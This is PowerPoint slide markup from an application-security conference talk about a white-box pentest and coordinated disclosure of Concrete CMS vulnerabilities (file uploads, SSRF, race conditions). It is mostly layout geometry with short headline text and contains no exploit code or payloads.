              <a:rPr lang="en-US" sz="2300" b="0" strike="noStrike" spc="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="0" strike="noStrike" spc="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>BSides</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="0" strike="noStrike" spc="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t> BUD, PTS, OWASP Porto</a:t>
            </a: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5715"/>
              </a:lnSpc>
            </a:pP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5715"/>
              </a:lnSpc>
            </a:pP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5715"/>
              </a:lnSpc>
            </a:pP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2786"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="25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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-187920"/>
            <a:ext cx="12587760" cy="7045560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 12587760"/>
              <a:gd name="textAreaRight" fmla="*/ 12588120 w 12587760"/>
              <a:gd name="textAreaTop" fmla="*/ 0 h 7045560"/>
              <a:gd name="textAreaBottom" fmla="*/ 7045920 h 7045560"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428760" y="6124680"/>
            <a:ext cx="2323800" cy="732960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 2323800"/>
              <a:gd name="textAreaRight" fmla="*/ 2324160 w 2323800"/>
              <a:gd name="textAreaTop" fmla="*/ 0 h 732960"/>
              <a:gd name="textAreaBottom" fmla="*/ 733320 h 732960"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="2324100" h="733425">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2324100" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2324100" y="733425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="73342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Freeform 4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TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631800" y="4212360"/>
            <a:ext cx="5490720" cy="1575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6205"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="443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WHATIS THIS TALK ABOUT? (APPSEC)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="443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reeform 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191760" cy="685764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TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4201920" y="783360"/>
            <a:ext cx="7533360" cy="1974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5182"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="48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File uploads are fun! </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="48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5182"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="48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SSRF in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" strike="sngStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS) Bold"/>
                <a:ea typeface="Calibri (MS) Bold"/>
              </a:rPr>
              <a:t>club</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri (MS) Bold"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>cloud</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="48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5182"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="48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Double Race condition?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975600" y="340560"/>
            <a:ext cx="7428240" cy="96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7571"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="541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About Concrete CMS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="54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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977760" y="1497960"/>
            <a:ext cx="7812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5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TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977760" y="2117880"/>
            <a:ext cx="7812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5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Box 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977760" y="3357720"/>
            <a:ext cx="7812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5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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977760" y="3977640"/>
            <a:ext cx="7812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5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Box 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977760" y="4597920"/>
            <a:ext cx="7812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5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TextBox 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977760" y="5217840"/>
            <a:ext cx="7812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5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Box 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206720" y="1492200"/>
            <a:ext cx="305928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Easy to use CMS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TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206720" y="2112120"/>
            <a:ext cx="298548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Written in PHP (&lt;3)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TextBox 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206720" y="3351960"/>
            <a:ext cx="450684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Used by the US DoD and US army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Box 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206720" y="3971880"/>
            <a:ext cx="440280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HackerOne bug Bounty (no $, just fame)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Box 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206720" y="4592160"/>
            <a:ext cx="780300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This was initially a project sponsored by one of our biggest London clients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TextBox 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206720" y="5218560"/>
            <a:ext cx="1000368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00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Following this coordinated disclosure PortlandLabs engaged us for future collaborations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="17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extBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206720" y="2872440"/>
            <a:ext cx="4085640" cy="306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415"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700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More than 62K live websites at the time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="17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Box 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110920" y="6361200"/>
            <a:ext cx="195480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TextBox 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977760" y="2738520"/>
            <a:ext cx="78120" cy="54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317"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1729" b="0" strike="noStrike" spc="-15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1729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TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251280" y="221400"/>
            <a:ext cx="11744280" cy="68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704"/>
              </a:lnSpc>
            </a:pP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2704"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="540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Concrete CMS –White Box Pentest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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954000" y="1484640"/>
            <a:ext cx="132120" cy="927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7302"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2920" b="0" strike="noStrike" spc="-24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292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Box 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1332720" y="1776600"/>
            <a:ext cx="5804280" cy="387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3050"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2180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Source code is available, let’s do white box </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="218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TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1332720" y="2412000"/>
            <a:ext cx="4961880" cy="690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5443"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2170" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Code is PHP, easy to read and audit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="217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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1332720" y="3162600"/>
            <a:ext cx="7579080" cy="690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5443"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2170" b="0" strike="noStrike" spc="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Some issues reported previously reported on hackerone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="217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TextBox 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1332720" y="3934440"/>
            <a:ext cx="9121320" cy="690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5443"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2170" b="0" strike="noStrike" spc="4">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Many issues reported by FORTBRIDGE with plenty of CVEs assigned</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="217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TextBox 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5060880" y="6362280"/>
            <a:ext cx="202680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TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954000" y="2279880"/>
            <a:ext cx="132120" cy="927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7302"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2920" b="0" strike="noStrike" spc="-24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292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TextBox 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954000" y="3031200"/>
            <a:ext cx="132120" cy="927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7302"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2920" b="0" strike="noStrike" spc="-24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292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TextBox 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954000" y="3786120"/>
            <a:ext cx="132120" cy="927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7302"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2920" b="0" strike="noStrike" spc="-24">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans Condensed"/>
                <a:ea typeface="IBM Plex Sans Condensed"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="292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08" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3700440" y="736560"/>
            <a:ext cx="4615560" cy="3125880"/>
            <a:chOff x="3700440" y="736560"/>
            <a:chExt cx="4615560" cy="3125880"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="109" name="Freeform 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3700440" y="736560"/>
              <a:ext cx="4615560" cy="3125880"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 4615560"/>
                <a:gd name="textAreaRight" fmla="*/ 4615920 w 4615560"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 3125880"/>
                <a:gd name="textAreaBottom" fmla="*/ 3126240 h 3125880"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
              <a:pathLst>
                <a:path w="8235314" h="5575173">
                  <a:moveTo>
                    <a:pt x="18415" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19050" y="48641"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13970" y="84709"/>
                    <a:pt x="13081" y="121412"/>
                    <a:pt x="11557" y="157988"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6477" y="291973"/>
                    <a:pt x="11557" y="425831"/>
                    <a:pt x="19177" y="559816"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28448" y="748157"/>
                    <a:pt x="11176" y="936244"/>
                    <a:pt x="19177" y="1124585"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33909" y="1505077"/>
                    <a:pt x="1016" y="1885569"/>
                    <a:pt x="12827" y="2266188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19558" y="2473071"/>
                    <a:pt x="41148" y="2680081"/>
                    <a:pt x="20447" y="2887091"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10287" y="3008630"/>
                    <a:pt x="11684" y="3130931"/>
                    <a:pt x="24765" y="3252343"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40386" y="3411474"/>
                    <a:pt x="44450" y="3571494"/>
                    <a:pt x="37084" y="3731006"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31369" y="3843401"/>
                    <a:pt x="22098" y="3955415"/>
                    <a:pt x="13208" y="4067556"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="4263517"/>
                    <a:pt x="4826" y="4459859"/>
                    <a:pt x="27305" y="4655185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43434" y="4815078"/>
                    <a:pt x="47625" y="4975352"/>
                    <a:pt x="44958" y="5135753"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25146" y="5552948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98552" y="5557139"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="139446" y="5564886"/>
                    <a:pt x="179959" y="5568315"/>
                    <a:pt x="220345" y="5568315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286258" y="5568315"/>
                    <a:pt x="351663" y="5559171"/>
                    <a:pt x="417195" y="5545328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="441579" y="5539613"/>
                    <a:pt x="466471" y="5536819"/>
                    <a:pt x="491236" y="5536819"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="524764" y="5536819"/>
                    <a:pt x="558165" y="5542026"/>
                    <a:pt x="590296" y="5552313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="600583" y="5555869"/>
                    <a:pt x="611378" y="5557647"/>
                    <a:pt x="622173" y="5557647"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="626491" y="5557647"/>
                    <a:pt x="630936" y="5557393"/>
                    <a:pt x="635254" y="5556758"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="688467" y="5548757"/>
                    <a:pt x="741680" y="5545963"/>
                    <a:pt x="794893" y="5545963"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="889000" y="5545963"/>
                    <a:pt x="982980" y="5554599"/>
                    <a:pt x="1076960" y="5558409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1175385" y="5562346"/>
                    <a:pt x="1273683" y="5566537"/>
                    <a:pt x="1371981" y="5566537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1473708" y="5566537"/>
                    <a:pt x="1575308" y="5562092"/>
                    <a:pt x="1676908" y="5548249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1733804" y="5540375"/>
                    <a:pt x="1790827" y="5537581"/>
                    <a:pt x="1847977" y="5537581"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1948053" y="5537581"/>
                    <a:pt x="2048129" y="5546344"/>
                    <a:pt x="2147951" y="5552059"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2267839" y="5558790"/>
                    <a:pt x="2387727" y="5564759"/>
                    <a:pt x="2507488" y="5564759"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2622423" y="5564759"/>
                    <a:pt x="2737358" y="5559298"/>
                    <a:pt x="2852166" y="5543550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2894711" y="5538597"/>
                    <a:pt x="2937510" y="5536057"/>
                    <a:pt x="2980309" y="5536057"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3036443" y="5536057"/>
                    <a:pt x="3092450" y="5540375"/>
                    <a:pt x="3147949" y="5548757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3217545" y="5558028"/>
                    <a:pt x="3287141" y="5561584"/>
                    <a:pt x="3356610" y="5561584"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3459353" y="5561584"/>
                    <a:pt x="3561842" y="5553837"/>
                    <a:pt x="3664585" y="5545201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3709035" y="5542026"/>
                    <a:pt x="3753612" y="5540502"/>
                    <a:pt x="3798062" y="5540502"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3868928" y="5540502"/>
                    <a:pt x="3939794" y="5544439"/>
                    <a:pt x="4010279" y="5552440"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4041394" y="5555615"/>
                    <a:pt x="4072763" y="5557139"/>
                    <a:pt x="4104005" y="5557139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4135247" y="5557139"/>
                    <a:pt x="4166616" y="5555615"/>
                    <a:pt x="4197731" y="5552440"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4227576" y="5549392"/>
                    <a:pt x="4257421" y="5548249"/>
                    <a:pt x="4287266" y="5548249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4364482" y="5548249"/>
                    <a:pt x="4441571" y="5556123"/>
                    <a:pt x="4518787" y="5560441"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4633214" y="5566791"/>
                    <a:pt x="4747768" y="5574030"/>
                    <a:pt x="4862449" y="5575173"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4921377" y="5575173"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4941443" y="5574919"/>
                    <a:pt x="4961636" y="5574538"/>
                    <a:pt x="4981829" y="5573776"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5029200" y="5573142"/>
                    <a:pt x="5076317" y="5567299"/>
                    <a:pt x="5122418" y="5556886"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5204968" y="5536439"/>
                    <a:pt x="5287899" y="5529073"/>
                    <a:pt x="5371084" y="5529073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5447157" y="5529073"/>
                    <a:pt x="5523357" y="5535169"/>
                    <a:pt x="5599557" y="5543169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5669153" y="5550408"/>
                    <a:pt x="5740908" y="5548885"/>
                    <a:pt x="5811393" y="5551679"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5836285" y="5552568"/>
                    <a:pt x="5861304" y="5552949"/>
                    <a:pt x="5886196" y="5552949"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5951601" y="5552949"/>
                    <a:pt x="6017006" y="5550663"/>
                    <a:pt x="6082284" y="5550663"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6144895" y="5550663"/>
                    <a:pt x="6207379" y="5552822"/>
                    <a:pt x="6269736" y="5561204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6278118" y="5563108"/>
                    <a:pt x="6286627" y="5563998"/>
                    <a:pt x="6295263" y="5563998"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6300598" y="5563998"/>
                    <a:pt x="6306058" y="5563617"/>
                    <a:pt x="6311392" y="5562855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6358001" y="5550917"/>
                    <a:pt x="6404356" y="5546726"/>
                    <a:pt x="6450711" y="5546726"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6542659" y="5546726"/>
                    <a:pt x="6634354" y="5563109"/>
                    <a:pt x="6726174" y="5567427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6780022" y="5569967"/>
                    <a:pt x="6833617" y="5571618"/>
                    <a:pt x="6887083" y="5571618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6994398" y="5571618"/>
                    <a:pt x="7101205" y="5564887"/>
                    <a:pt x="7208266" y="5544948"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7269734" y="5533518"/>
                    <a:pt x="7331583" y="5529581"/>
                    <a:pt x="7393686" y="5529581"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7478903" y="5529581"/>
                    <a:pt x="7564374" y="5537074"/>
                    <a:pt x="7649464" y="5543297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7750682" y="5551806"/>
                    <a:pt x="7852282" y="5556505"/>
                    <a:pt x="7953882" y="5557901"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8235314" y="5551679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8235314" y="0"/>
                  </a:ln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10" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671040" y="4489200"/>
            <a:ext cx="11049120" cy="81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6412"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="455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Let's try a malicious .php extension</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="45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Box 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4674600" y="6412680"/>
            <a:ext cx="210312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Freeform 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657360" y="6362640"/>
            <a:ext cx="1342800" cy="151920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 1342800"/>
              <a:gd name="textAreaRight" fmla="*/ 1343160 w 1342800"/>
              <a:gd name="textAreaTop" fmla="*/ 0 h 151920"/>
              <a:gd name="textAreaBottom" fmla="*/ 152280 h 151920"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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13" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3538080" y="1089720"/>
            <a:ext cx="4273920" cy="2964600"/>
            <a:chOff x="3538080" y="1089720"/>
            <a:chExt cx="4273920" cy="2964600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="114" name="Freeform 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3538080" y="1089720"/>
              <a:ext cx="4273920" cy="2964600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 4273920"/>
                <a:gd name="textAreaRight" fmla="*/ 4274280 w 4273920"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 2964600"/>
                <a:gd name="textAreaBottom" fmla="*/ 2964960 h 2964600"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
              <a:pathLst>
                <a:path w="8013954" h="5587874">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5553964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135509" y="5547868"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="243459" y="5551678"/>
                    <a:pt x="351536" y="5560441"/>
                    <a:pt x="459740" y="5560441"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="497332" y="5560441"/>
                    <a:pt x="534924" y="5559425"/>
                    <a:pt x="572643" y="5556631"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="651002" y="5551043"/>
                    <a:pt x="729107" y="5548503"/>
                    <a:pt x="807720" y="5547995"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="820674" y="5547868"/>
                    <a:pt x="833628" y="5547868"/>
                    <a:pt x="846582" y="5547868"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1021461" y="5547868"/>
                    <a:pt x="1195959" y="5557012"/>
                    <a:pt x="1370584" y="5565013"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1378077" y="5565394"/>
                    <a:pt x="1385697" y="5565521"/>
                    <a:pt x="1393190" y="5565521"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1453134" y="5565521"/>
                    <a:pt x="1512189" y="5554980"/>
                    <a:pt x="1571625" y="5548122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1610741" y="5543550"/>
                    <a:pt x="1649730" y="5541772"/>
                    <a:pt x="1688719" y="5541772"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1794129" y="5541772"/>
                    <a:pt x="1899031" y="5554726"/>
                    <a:pt x="2004314" y="5560187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
